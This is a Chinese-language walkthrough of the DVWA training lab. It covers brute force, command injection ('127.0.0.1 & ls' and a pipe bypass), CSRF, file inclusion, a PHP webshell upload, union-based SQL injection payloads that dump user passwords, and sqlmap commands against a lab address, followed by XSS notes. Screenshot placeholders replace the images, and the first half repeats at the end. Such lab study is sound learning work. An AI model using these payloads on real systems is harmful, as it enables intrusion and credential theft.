Brute Force(暴力破解)
burp爆破账户和密码,采用集束炸弹
转存失败重新上传取消
2.Commad Execution(命令注入)
low级别
查看源码,没有进行过滤
转存失败重新上传取消
查看文件/127.0.0.1 & ls
转存失败重新上传取消
查看地址
转存失败重新上传取消
medium级别
medium级别将&进行了过滤
将&换成|
地址
转存失败重新上传取消
查看文件
转存失败重新上传取消
3.CSRF
LOW级别
抓CSRF包,带账户密码的,右击生成poc,
转存失败重新上传取消
生成网址后,点进去http://burpsuite/show/2/ynd1nokfwzmk3wal6brj2uqsb969obee后会修改账户密码
转存失败重新上传取消
4.File lnclusion
LOW级别
随便输入一个文件,跳出路径。文件在page后面
转存失败重新上传取消
输入一个存在的文件
转存失败重新上传取消
medium级别
过滤了小写
转存失败重新上传取消
转存失败重新上传取消
5.File Upload
LOW级别
将有一句话木马的php文件上传,并与意见连接
转存失败重新上传取消
Medium级别
修改文件后缀,在上传是用burp抓包,并将后缀名修改回来
转存失败重新上传取消
蚁剑连接成功
转存失败重新上传取消
6.SQL lnjection
账户用户名
转存失败重新上传取消
用户名和数据库名:1'union select database(),user()#
转存失败重新上传取消
数据库版本和操作系统:1' union select version(),@@version_compile_os#
转存失败重新上传取消
数据库表:1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#
转存失败重新上传取消
爆出dvwa库,users表中的账户、密码:1' union select user,password from users#
转存失败重新上传取消
Medium级别
数字型注入:不需要单引号
需要去burp中修改
转存失败重新上传取消
获取用户表名
转存失败重新上传取消
表字段
转存失败重新上传取消
password字段
转存失败重新上传取消
7.SQL lnjection(盲注)
输入1,将网址复制到sqlmap,同时抓包burp,将cookie复制到sqlmap
sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" (-u 对网址)
转存失败重新上传取消
加dbs,查出数据库
sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" --dbs
转存失败重新上传取消
-D'数据库' #报数据库 , --tables #数据库表
爆4个数据库表
sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" -D 'dvwa' --tables
转存失败重新上传取消
-T '表名' --columns #字段名
爆出8个字段
sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" -D 'dvwa' -T 'users' --columns
转存失败重新上传取消
-C '要爆的东西'
爆账户密码uid,共5个
sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" -D 'dvwa' -T 'users' -C 'username,password,user_id' --dump
转存失败重新上传取消
Medium级别
先用burp抓包,将内容保存到文件(名:medium)
sqlmap -r medium
转存失败重新上传取消
数据库 sqlmap -r medium --dbs
转存失败重新上传取消
爆出24个表
转存失败重新上传取消
低级和中级都一样,就不往下做了
8.XSS reflected(反射型)
LOW
转存失败重新上传取消
Medium
将
转存失败重新上传取消
High
将
转存失败重新上传取消
Medium
Burp抓包,修改name出的代码,可以大写绕过
转存失败重新上传取消
转存失败重新上传取消
High
.Brute Force(暴力破解)
burp爆破账户和密码,采用集束炸弹
正在上传…重新上传取消
2.Commad Execution(命令注入)
low级别
查看源码,没有进行过滤
正在上传…重新上传取消
查看文件/127.0.0.1 & ls
正在上传…重新上传取消
查看地址
正在上传…重新上传取消
medium级别
medium级别将&进行了过滤
将&换成|
地址
正在上传…重新上传取消
查看文件
正在上传…重新上传取消
3.CSRF
LOW级别
抓CSRF包,带账户密码的,右击生成poc,
正在上传…重新上传取消
生成网址后,点进去http://burpsuite/show/2/ynd1nokfwzmk3wal6brj2uqsb969obee后会修改账户密码
正在上传…重新上传取消
4.File lnclusion
LOW级别
随便输入一个文件,跳出路径。文件在page后面
正在上传…重新上传取消
输入一个存在的文件
正在上传…重新上传取消
medium级别
过滤了小写
正在上传…重新上传取消
正在上传…重新上传取消
5.File Upload
LOW级别
将有一句话木马的php文件上传,并与意见连接
正在上传…重新上传取消
Medium级别
修改文件后缀,在上传是用burp抓包,并将后缀名修改回来
正在上传…重新上传取消
蚁剑连接成功
正在上传…重新上传取消